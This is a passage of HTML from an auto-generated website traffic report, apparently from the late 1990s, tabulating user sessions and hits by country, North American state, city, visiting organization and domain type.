<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Finland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Switzerland </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7839</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopStates"><!--Visitors & Demographics::North American States--></A>
<!-- WT_H1>North American States and Provinces</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>North American States and Provinces</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section breaks down web site activity to show which of the North American States and Provinces were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index08.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS -->
<CENTER><B>North American States & Provinces</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>North American States</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>State</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Virginia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3928</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>California</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">743</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Minnesota</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">297</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Georgia</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Oregon</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">182</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Illinois</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">67</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ontario</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Texas</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">45</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Florida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">39</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Washington</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD><FONT SIZE=3 FACE="" COLOR="#000000"><B>Total For the States Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5619</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCities"><!--Visitors & Demographics::Most Active Cities--></A>
<!-- WT_H1>Most Active Cities</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Cities</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section further breaks down the site's activity to show which cities were the most active on the site. This information is based on where the domain name of the visitor is registered, and may not always be an accurate representation of the actual geographic location of this visitor. This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index09.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 3.7, 2</WT_TABLE_STATS -->
<CENTER><B>Activity by City</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Cities</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>City, State</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Vienna, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3786</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Berkeley, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Golden Valley, Minnesota, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mountain View, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">213</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Atlanta, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Medofrd, Oregon, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Falls Church, Virginia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Palo Alto, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Norcross, Georgia, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>San Francisco, California, United States</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Cities Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5167</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopCompanies"><!--Visitors & Demographics::Most Active Organizations--></A>
<!-- WT_H1>Most Active Organizations</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Organizations</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the companies or organizations that accessed the site the most often.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index10.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Active Organizations</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Active Organizations</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organizations</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>America Online</B><BR><A href="http://rs.internic.net/cgi-bin/whois?aol.com">aol.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6826</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.83%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3785</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Leni Wilcox Consultant</B><BR><A href="http://rs.internic.net/cgi-bin/whois?home.com">home.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2986</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">256</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mikota Maentz</B><BR><A href="http://rs.internic.net/cgi-bin/whois?rr.com">rr.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2194</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">175</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bellsouth Network Solutions</B><BR><A href="http://rs.internic.net/cgi-bin/whois?bellsouth.net">bellsouth.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2130</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Uunet Technologies Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?uu.net">uu.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1279</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">101</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?198.139.155.30">198.139.155.30</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1075</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mindspring Enterprises Inc.</B><BR><A href="http://rs.internic.net/cgi-bin/whois?mindspring.com">mindspring.com</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">816</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.29%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?fastsearch.net">fastsearch.net</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">754</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?cambrian.mb.ca">cambrian.mb.ca</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">655</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><A href="http://rs.internic.net/cgi-bin/whois?nipr.mil">nipr.mil</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">468</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.74%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Subtotal For Companies Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>19183</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>30.43%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>5710</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSuffixes"><!--Visitors & Demographics::Organization Breakdown--></A>
<!-- WT_H1>Organization Breakdown</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Organization Breakdown</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides a breakdown by types of organizations (.com, .net, .edu, .org, .mil, and .gov.) This information can only be displayed if reverse DNS lookups have been performed.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index11.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Organization Breakdown</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Organization Breakdown</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Organization</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20642</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">49.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5715</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Network</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16930</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1410</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Education</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2774</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">259</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Military</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">871</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.07%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Organization</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">411</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR>
